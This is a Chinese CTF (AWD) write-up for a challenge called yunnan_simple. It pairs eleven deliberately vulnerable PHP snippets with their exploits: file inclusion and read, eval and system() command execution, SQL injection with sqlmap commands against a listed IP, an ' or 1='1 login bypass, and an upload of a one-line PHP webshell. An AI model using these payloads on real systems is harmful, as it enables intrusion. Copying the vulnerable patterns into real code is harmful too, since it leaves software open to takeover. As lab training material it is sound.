AWD——yunnan_simple Writeup

1.文件包含漏洞

源码

<?php
    $file=$_GET['file'];
    include $file;
?>

漏洞利用

/about.php?file=../flag

2.代码执行漏洞

源码

@eval($_REQUEST['c']);

漏洞利用

/config.php?c=system('cat ../flag');

3.任意文件读取漏洞

源码

<?php
    include 'header.php';
    $file_path = $_GET['path'];
    if(file_exists($file_path)){
    $fp = fopen($file_path,"r");
    $str = fread($fp,filesize($file_path));
    echo $str = str_replace("\r\n","<br />",$str);
                            }
?>

漏洞利用

/contact.php?path=../flag

4.代码执行漏洞

源码

<?php 
    $shell=$_POST['shell'];
    system($shell);
    if($shell !=""){
        exit();
    }
?>

漏洞利用

ls /
# app bin boot data dev etc flag home lib lib64 media mnt opt proc root run run.sh sbin srv sys tmp usr var web
cat /flag

5.代码执行漏洞

源码

<?php 
include 'header.php';
@eval($_REQUEST['aa']);
?>

漏洞利用

/index.php?aa=system('cat ../flag');

6.SQL注入漏洞

源码

<?php
    include 'header.php';
    include_once('config.php');
    if (!empty($_GET['id'])) {
    $id=$_GET['id'];
    $query = "SELECT * FROM news WHERE id=$id";
    $data = mysqli_query($dbc,$query);  
    }
    $com = mysqli_fetch_array($data); 
?>

漏洞利用

#sqlmap检测
python sqlmap.py -u http://47.74.13.136:8802/search.php?id=1
#列出所有数据库
python sqlmap.py -u http://47.74.13.136:8802/search.php?id=1 --dbs
#列出指定数据库的表
python sqlmap.py -u http://47.74.13.136:8802/search.php?id=1 -D cyber --tables

7.代码执行漏洞

源码

<?php 
    $shell=$_POST['shell'];
    system($shell);
    if($shell !=""){
        exit();
    }
?>

漏洞利用

ls /
# app bin boot data dev etc flag home lib lib64 media mnt opt proc root run run.sh sbin srv sys tmp usr var web
cat /flag

8.万能钥匙

源码

<?php
    include_once('config.php');
    if (!empty($_POST['username'])) {
    $user=$_POST['username'];
    $pass=$_POST['password'];
    $query = "SELECT * FROM admin WHERE user_name='{$user}' and user_pass='{$pass}' ";
    $data = mysqli_query($dbc,$query);  
     if (mysqli_num_rows($data) == 1) {
        $row = mysqli_fetch_array($data);
        $_SESSION['username'] = $row['user_name'];
        header('Location: ./admin/index.php');
     }else{
       echo '<hr/><center><br/>用户名:',$user,'<br/>密码:',$pass,'<br/><br/>用户名密码错误</center>';
       }   
} 
?>

漏洞利用

' or 1='1

9.信息泄露

源码

<h3>flag:<?php system("cat /flag")?></h3>

10.任意命令执行

源码

<?php 
    $p=$_GET['p'];
    echo $p;
    $q=exec($p);
    var_dump($q);
?>

漏洞利用

/admin/header.php?p=cat /flag

11.文件上传漏洞

源码

$error=$_FILES['pic']['error'];
$tmpName=$_FILES['pic']['tmp_name'];
$name=$_FILES['pic']['name'];
$size=$_FILES['pic']['size'];
$type=$_FILES['pic']['type'];
try{
    if($name!=="")
    {
        $name1=substr($name,-4);
        if(is_uploaded_file($tmpName)){
            $time=time();
            $rootpath='./upload/'.$time.$name1;
            $file=fopen($tmpName, "r") or die('No such file!');
                    $content=fread($file, filesize($tmpName));
                    if(strstr($content,'fuck')){
                            exit("<script language='JavaScript'>alert('You should not do this!');window.location='index.php?page=submit'</script>");
                    }
            if(!move_uploaded_file($tmpName,$rootpath)){
                echo "<script language='JavaScript'>alert('文件移动失败!');window.location='index.php?page=submit'</script>";
                exit;
            }
        }
        echo "上传成功:/upload/".$time.$name1;
    }
}
catch(Exception $e)
{
    echo "ERROR";
}

漏洞利用

#传入一句话木马1.php
<?php @eval($_REQUEST['c']);?>
/admin/upload/1718338939.php?c=system('cat /flag');
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇